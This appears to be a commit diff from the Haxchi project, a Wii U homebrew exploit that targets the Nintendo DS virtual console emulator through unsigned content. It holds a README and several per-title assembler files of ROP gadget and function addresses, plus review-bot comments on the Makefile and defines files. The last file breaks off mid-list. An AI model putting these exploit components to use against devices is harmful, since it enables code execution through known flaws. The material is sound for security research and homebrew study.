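Review bot: `.PHONY := all code550.bin` on the first line is a variable assignment, not the `.PHONY` special target, so nothing in this file is phony and the per-game, `setup_*`, `*.nds`, `*.zip` and `clean` rules only run because their names never exist as files (the recipes write into `$(BUILD)` and `$(TARGET_PATH)` instead of `$@`); it should read `.PHONY: all setup clean` followed by the game, `setup_*`, `*.nds` and `*.zip` names. The `ifeq ($(Windows_NT), 1)` test reads an undefined variable, so `ZIP = zip/zip.exe` is never selected; the environment exposes the platform as `OS=Windows_NT`, and `ifeq ($(OS),Windows_NT)` is the usual check. `clean` removes `$(DATA)`, which is not defined anywhere in this file (the output directory is `$(TARGET_PATH)`), so that argument expands to nothing and `--warn-undefined-variables` would flag it. Finally, the prerequisite order in `all` is the only thing sequencing `setup`, each `setup_*` and each `*.nds` through the shared `defines.s`/`rom.nds` scratch files, so the build is not safe under `make -j`; a `.NOTPARALLEL:` line would at least make that explicit until each `*.nds` rule lists its `setup_*` as a prerequisite and derives its scratch names from `$@`.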


@ -0,0 +1,27 @@
# Haxchi-Exploit
This is the continuation of Haxchi from FIX94 (initial PoC by smea).
```
haxchi is an exploit for the Nintendo DS virtual console emulator on Wii U (hachihachi).
it is possible due to "contenthax", a vulnerability in the wii u's title integrity design:
only code and critical descriptors are signed, with all other contents left at the mercy of attackers.
```
# Usage
Put a payload `code550.bin` in the root of this project.
This payload should be statically linked to 0x18000000, and is called inside a thread.
Make sure to exit this thread via `OSExitThread(0);`, afterwards the rop switches automatically to the Mii Maker.
An example payload which perform the kernel exploit can be found [here](https://github.com/wiiu-env/haxchi_payload).
# Notes
Currently this ONLY executes a given `code550.bin`, nothing usable for the end user. Only one game, no CFW, no coldboothax, nothing.
## Dependencies
[armips](https://github.com/Kingcom/armips/releases) and zip in your PATH variable.
## credit
smea, plutoo, yellows8, naehrwert, derrek, FIX94, dimok and orboditilt.


@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1079B6A4-0xC8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C91938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16440F00)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0200369C)
BCTRL equ (RPX_OFFSET + 0x020041D8)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A9DC4)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A999C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001AF8)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0217F924)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x0227F310)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018AB0)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B5204)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F624)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020862CC)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205A454)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018B38)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0214FA58)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020244B4)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x022290AC)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x022294C8)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x02228F58)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006E2C)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FF0C)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02228B9C)
_START_EXIT equ (RPX_OFFSET + 0x020265DC)


@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x107969A4-0xB8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C8C938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x1643F200)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x022070C4)
BCTRL equ (RPX_OFFSET + 0x02206FFC)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3650)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A327C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA78)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x021791A8)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B84)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018910)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AEA90)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4B0)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082F58)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02057A10)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018998)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x021492E4)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240F4)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02221A28)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E44)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x022218D4)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CD0)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB24)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220D8C)
_START_EXIT equ (RPX_OFFSET + 0x02026944)


@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1079C564-0xC8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C92938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16441D00)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0200369C)
BCTRL equ (RPX_OFFSET + 0x020041D8)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020ABF88)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020ABB60)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001AF8)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02181AC0)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02281624)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018A88)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B73C8)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F610)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020882E0)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205B0C8)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018B10)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02151BF4)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0202441C)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x0222B2FC)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222B718)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x0222B1A8)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006E2C)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FE74)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x0222ADEC)
_START_EXIT equ (RPX_OFFSET + 0x02026544)


@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x10796964-0xB8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C8C938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x1643F200)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02207084)
BCTRL equ (RPX_OFFSET + 0x02206FBC)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3610)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A323C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020ACA38)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179168)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B44)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018908)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AEA50)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4A8)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DC0)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205788C)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018990)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x021492A4)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240EC)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x022219E8)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E04)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x02221894)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB1C)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220D4C)
_START_EXIT equ (RPX_OFFSET + 0x0202693C)


@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1079A3E4-0xC0)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C90938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16444500)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0204AE04)
BCTRL equ (RPX_OFFSET + 0x02003D2C)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020AA490)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020AA068)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001A8C)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0217FFE8)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x0227F898)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020187E4)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B58D0)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F358)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020883B0)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205C700)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x0201886C)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02150124)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020241C8)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x022296A0)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02229ABC)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x0222954C)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006B60)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FC30)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02229190)
_START_EXIT equ (RPX_OFFSET + 0x020262EC)


@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1077870C-0xB0)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10A77038)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16229400)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x022031F8)
BCTRL equ (RPX_OFFSET + 0x02203130)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A04C8)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A00A0)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02005AB8)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02175AE8)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x022740A8)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02017F88)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AB88C)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200EB28)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020809E4)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02054DCC)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018010)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02145D64)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02023700)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x0221E0B8)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x0221E4D4)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x0221DF64)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006944)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201F138)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x0221D434)
_START_EXIT equ (RPX_OFFSET + 0x02025F48)
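Review bot: The new defines file carries no comment saying which title, region or executable version its addresses were taken from, and since every defines file added in this commit has the identical layout and differs only in the hex values, a wrong pairing is invisible until the ROP chain is run; a one-line header such as `; gadget/function addresses for <TITLE/REGION placeholder>, executable version <placeholder> — regenerate when the binary changes` at the top of each file would make the mapping auditable. The same applies to the other new defines files in this commit. `RPX_OFFSET equ (0x01800000)` and `ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)` are repeated verbatim in all of them; they are derived rather than per-title, so they belong once in the shared rop source, leaving only the title-specific values here. The `-0xB0` in `HAX_TARGET_ADDRESS equ (0x1077870C-0xB0)` is also undocumented and varies between files (`-0xB8`, `-0xC0`, `-0xC8` elsewhere), so a comment stating what the subtracted frame offset is relative to would help whoever has to refresh these values.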


@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1079B924-0xB8)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10C91938)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16444200)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x020645EC)
BCTRL equ (RPX_OFFSET + 0x02004158)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3F34)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A3B0C)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0200106C)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179A8C)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02278460)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018908)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AF374)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4A8)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020836A8)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02057944)
LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018990)
LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02149BC8)
MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240EC)
; functions used from game
NERD_CREATETHREAD equ (RPX_OFFSET + 0x02222304)
NERD_STARTTHREAD equ (RPX_OFFSET + 0x02222720)
NERD_JOINTHREAD equ (RPX_OFFSET + 0x022221B0)
HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB1C)
CORE_SHUTDOWN equ (RPX_OFFSET + 0x02221670)
_START_EXIT equ (RPX_OFFSET + 0x0202699C)


@ -0,0 +1,39 @@
; game stack return address
HAX_TARGET_ADDRESS equ (0x1077860C-0xB0)
; application memory pointer
HACHI_APPLICATION_PTR equ (0x10A77038)
; arm9 rom location address
ARM9_ROM_LOCATION equ (0x16229800)
; constants for position calcs
RPX_OFFSET equ (0x01800000)
ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
; rop-gadgets part 1 (used for all sorts of different things)
LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x022031F8)
BCTRL equ (RPX_OFFSET + 0x02203130)
MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A04C8)
LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A00A0)
LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02005AB8)
MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02175AE8)
LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x022740A8)
; rop-gadgets part 2 (only used to set up core 0 thread stack)
LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02017F88)
MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AB88C)
LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200EB28)
LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020809E4)
LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02054DCC)
